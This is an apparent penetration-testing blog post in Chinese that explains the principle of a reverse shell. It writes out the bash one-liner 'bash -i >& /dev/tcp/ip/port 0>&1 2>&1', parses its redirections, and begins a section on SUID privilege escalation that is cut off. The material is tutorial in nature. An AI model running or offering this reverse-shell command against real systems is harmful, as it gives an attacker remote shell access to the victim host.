反弹shell

反弹shell的原理:通过受害主机运行攻击者的程序,主动与攻击主机进行tcp会话,同时攻击主机处于监听状态,之后一步一步提权反弹shell:1.指令: bash -i >& /dev/tcp/ip/port 0>&1 2>&1 2.指令解析:bash -i 创建一个shell会话在介绍>&之前,先介绍以下描述符描述符 : 0 标准输入 1 标准输出 2 错误输出xx >& xx : >&后面如果是文件的话,意思就是将前面的输出传进后面的文件里 如果后面是描述符,如0>&1就是将标准输入传入到标准输出3.总结:上述指令的含义是:将本地终端的标准输出传入到远程主机(bash -i >& /dev···),之后将远程主机的标准输入传入本地终端(0>&1),执行完成后将标准输出传入到远程主机,形成一个回环find suid提权原理通过具有suid权限的可执行二进制文件可以使得权限暂时提升为root用户,在当前任务线

渗透测试 · 05-31
2022 - 2023 Hei-blog. All Rights Reserved.
Theme Jasmine by Kent Liao